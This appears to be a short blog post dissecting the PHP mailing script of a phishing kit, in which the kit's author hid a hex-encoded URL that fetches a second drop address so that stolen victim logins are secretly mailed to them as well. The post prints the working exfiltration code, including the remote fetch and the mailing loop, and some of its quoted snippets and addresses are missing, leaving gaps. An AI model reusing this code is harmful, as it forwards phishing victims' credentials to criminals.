Sometimes spammers / scammers are so stupid it is amusing again. I just received several mails with the php-source for the result-collecting and mailing script for the phishing site. Interesting code snippets:
But, the scammer gets scammed too. Look at this code snippet:

Takes a bit of decoding, but it seems copies are sent to
The same spammer also mailed a different script with the same function. This script is clear on where to put the dropbox address:
        //This is your email
		$to = "" ; // Write your email
But in the next lines...
/* EnD Configuration */
$victimIP = pack("H*", "687474703a2f2f667265657363616d732e33782e726f2f656d61696c2e706870");
$DetailsIP = file_get_contents($victimIP, "r");
$DetailsIP = pack("H*", $DetailsIP);
$victimip unpacks to so the scammer of the scammer can 'maintain' this and change dropbox if needed. Currently that shows a page which I think says that the page does not exist. The result would be used in the code:
$arr=array($to, $DetailsIP);
foreach ($arr as $to){mail($to, $subj, $msg, $from);}
header("Location: done.html?cmd=_login-run");
You can't trust a good scammer these days, it seems...

